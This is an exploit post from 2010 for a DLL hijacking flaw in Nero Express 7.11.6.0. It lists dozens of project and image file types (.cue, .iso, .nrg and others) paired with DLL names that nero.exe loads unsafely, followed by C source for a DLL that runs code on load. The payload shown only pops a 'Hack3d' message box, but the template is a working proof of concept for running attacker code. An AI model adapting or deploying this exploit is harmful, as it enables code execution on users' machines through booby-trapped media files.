Nero Express 7.11.6.0

所属类别 nero.exe

nero.c
######################################################################## 
# Vendor: http://www.nero.com/
# Date: 2010-07-27 
# Author : indoushka 
# Thanks to : Dz-Ghost Team
# Contact : 00213771818860
# Tested on : windows SP2 Francais V.(Pnx2 2.0) 
######################################################################## 
# Exploit By indoushka 
-------------
wvs.exe
-------
exploited nero.exe with exploit.cue using mfc71fra.dll
exploited nero.exe with exploit.cue using mfc71loc.dll
exploited nero.exe with exploit.cue using bcgpoleacc.dll
exploited nero.exe with exploit.iso using mfc71fra.dll
exploited nero.exe with exploit.iso using mfc71loc.dll
exploited nero.exe with exploit.nhf using mfc71fra.dll
exploited nero.exe with exploit.nhf using mfc71loc.dll
exploited nero.exe with exploit.nhv using mfc71fra.dll
exploited nero.exe with exploit.nhv using mfc71loc.dll
exploited nero.exe with exploit.nmd using mfc71fra.dll
exploited nero.exe with exploit.nmd using mfc71loc.dll
exploited nero.exe with exploit.nmd using bcgpoleacc.dll
exploited nero.exe with exploit.nr3 using mfc71fra.dll
exploited nero.exe with exploit.nr3 using mfc71loc.dll
exploited nero.exe with exploit.nr3 using bcgpoleacc.dll
exploited nero.exe with exploit.nr4 using mfc71fra.dll
exploited nero.exe with exploit.nr4 using mfc71loc.dll
exploited nero.exe with exploit.nr4 using bcgpoleacc.dll
exploited nero.exe with exploit.nra using mfc71fra.dll
exploited nero.exe with exploit.nra using mfc71loc.dll
exploited nero.exe with exploit.nra using bcgpoleacc.dll
exploited nero.exe with exploit.nrb using mfc71fra.dll
exploited nero.exe with exploit.nrb using mfc71loc.dll
exploited nero.exe with exploit.nrb using bcgpoleacc.dll
exploited nero.exe with exploit.nrc using mfc71fra.dll
exploited nero.exe with exploit.nrc using mfc71loc.dll
exploited nero.exe with exploit.nrc using bcgpoleacc.dll
exploited nero.exe with exploit.nrd using mfc71fra.dll
exploited nero.exe with exploit.nrd using mfc71loc.dll
exploited nero.exe with exploit.nrd using bcgpoleacc.dll
exploited nero.exe with exploit.nre using mfc71fra.dll
exploited nero.exe with exploit.nre using mfc71loc.dll
exploited nero.exe with exploit.nre using bcgpoleacc.dll
exploited nero.exe with exploit.nrg using mfc71fra.dll
exploited nero.exe with exploit.nrg using mfc71loc.dll
exploited nero.exe with exploit.nrg using bcgpoleacc.dll
exploited nero.exe with exploit.nrh using mfc71fra.dll
exploited nero.exe with exploit.nrh using mfc71loc.dll
exploited nero.exe with exploit.nrh using bcgpoleacc.dll
exploited nero.exe with exploit.nri using mfc71fra.dll
exploited nero.exe with exploit.nri using mfc71loc.dll
exploited nero.exe with exploit.nri using bcgpoleacc.dll
exploited nero.exe with exploit.nrj using mfc71fra.dll
exploited nero.exe with exploit.nrj using mfc71loc.dll
exploited nero.exe with exploit.nrj using bcgpoleacc.dll
exploited nero.exe with exploit.nrm using mfc71fra.dll
exploited nero.exe with exploit.nrm using mfc71loc.dll
exploited nero.exe with exploit.nrm using bcgpoleacc.dll
exploited nero.exe with exploit.nrs using mfc71fra.dll
exploited nero.exe with exploit.nrs using mfc71loc.dll
exploited nero.exe with exploit.nrs using bcgpoleacc.dll
exploited nero.exe with exploit.nru using mfc71fra.dll
exploited nero.exe with exploit.nru using mfc71loc.dll
exploited nero.exe with exploit.nru using bcgpoleacc.dll
exploited nero.exe with exploit.nrv using mfc71fra.dll
exploited nero.exe with exploit.nrv using mfc71loc.dll
exploited nero.exe with exploit.nrv using bcgpoleacc.dll
exploited nero.exe with exploit.nrw using mfc71fra.dll
exploited nero.exe with exploit.nrw using mfc71loc.dll
exploited nero.exe with exploit.nrw using bcgpoleacc.dll
exploited nero.exe with exploit.nsd using mfc71fra.dll
exploited nero.exe with exploit.nsd using mfc71loc.dll
exploited nero.exe with exploit.nsd using bcgpoleacc.dll
-------------
#include "stdafx.h"
#include "stdlib.h"
void init() {
MessageBox(NULL,"indoushka", "Hack3d",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}